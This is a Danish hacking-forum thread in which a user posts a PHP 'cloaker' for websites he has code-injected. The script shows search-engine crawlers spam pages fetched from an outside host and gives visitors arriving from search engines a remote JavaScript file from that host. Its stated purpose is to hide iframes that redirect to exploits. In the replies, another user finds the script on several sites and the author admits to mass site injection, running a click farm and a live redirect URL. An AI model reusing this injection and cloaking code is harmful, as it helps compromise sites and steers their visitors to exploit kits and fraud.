Cloaking [PHP]

[acc3ss]

Traffik Cloaking er når du viderestiller crawler/spider refferrers til deadends og det er noget som man gør hvis man har en side med en iframe som viderestiller til nogle exploits for ikke at få urene loads.
Jeg har skrevet denne cloaker og man kan så videre skrive på den, dette var en beta af min cloacker jeg har siden hen inkluderet forbindelse filtering og andet lækker

Dette er et yderst vigtigt redskab hvis du vil sortere din traffik fra feks. hackede hjemmeside som du har kode injekted.

<?php

/*

Cloaker | skrevet af acc3ss

*/

function isCrawler() {

    $agent= strtolower($_SERVER['HTTP_USER_AGENT']);

    if (!empty($agent)) {

        $spiderSite= array(

            "TencentTraveler",

            "Baiduspider+",

            "BaiduGame",

            "Googlebot",

            "msnbot",

            "Sosospider+",

            "Sogou web spider",

            "ia_archiver",

            "Yahoo! Slurp",

            "YoudaoBot",

            "Yahoo Slurp",

            "MSNBot",

            "Java (Often spam bot)",

            "BaiDuSpider",

            "Voila",

            "Yandex bot",

            "BSpider",

            "twiceler",

            "Sogou Spider",

            "Speedy Spider",

            "Google AdSense",

            "Heritrix",

            "Python-urllib",

            "Alexa (IA Archiver)",

            "Ask",

            "Exabot",

            "Custo",

            "OutfoxBot/YodaoBot",

            "yacy",

            "SurveyBot",

            "legs",

            "lwp-trivial",

            "Nutch",

            "StackRambler","360",

            "The web archive (IA Archiver)",

            "Perl tool",

            "MJ12bot",

            "Netcraft",

            "MSIECrawler",

            "WGet tools",

            "larbin",

            "Fish search",

        );

        foreach($spiderSite as $val) {

            $str = strtolower($val);

            if (strpos($agent, $str) !== false) {

                return true;

            }

        }

    } else {

        return false;

    }

}



function isfromse() {

    $agent= strtolower($_SERVER['HTTP_REFERER']);

    if (!empty($agent)) {

        $spiderSite= array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","youdao");

        foreach($spiderSite as $val) {

            $str = strtolower($val);

            if (strpos($agent, $str) !== false) {

                return true;

            }

        }

    } else {

        return false;

    }

}



if (isCrawler()){

    $trust_str = file_get_contents('http://www.yhabe.org/1.txt');

    $nobody_str = file_get_contents('http://www.yhabe.org/2.html');

    $nobody_str = str_replace('{&#x671F;&#x6570;}',$trust_str, $nobody_str);

    ob_get_clean();

    echo $nobody_str;

    die();

}



if (isfromse()){

ob_get_clean();

echo '<script type="text/javascript" src="http://www.yhabe.org/3.js"></script>';

}

?>

---

Men at filter og blacklist iper/hostname/domains det kræver en kæmpe database og dem skaffer man sig over en længere periode, men i kan godt komme langt med mit script (-:

[Ash]

http://www.gzmida.com/
http://www.yartool.com/
http://www.itiunion.cn/

osv.

Nu siger du godt nok dit script, men jeg kan nu finde det flere steder? Kan jo selvfølgeligt være dine kinesiske sider.
Og by the way, jeg tror du mener cloaking? Cloack er i hvert fald ikke et ord

[acc3ss]

http://www.gzmida.com/
http://www.yartool.com/
http://www.itiunion.cn/

osv.

Nu siger du godt nok dit script, men jeg kan nu finde det flere steder? Kan jo selvfølgeligt være dine kinesiske sider.
Og by the way, jeg tror du mener cloaking? Cloack er i hvert fald ikke et ord

Jeg var ret træt (skæv) da jeg skrev det, retter det nu.

Jo det er et script jeg har skrevet og min partner V.ick er kineser og det er derfor yhabe i brug.
Vi bruger også en masse sider som vi kode injekter med vores iframes.

Her er et af mine beps flow:
http://109.236.92.187/index/public.php?i=61038a27


Køre en større clickfarm med V.ick og dette er bare et beta script (-: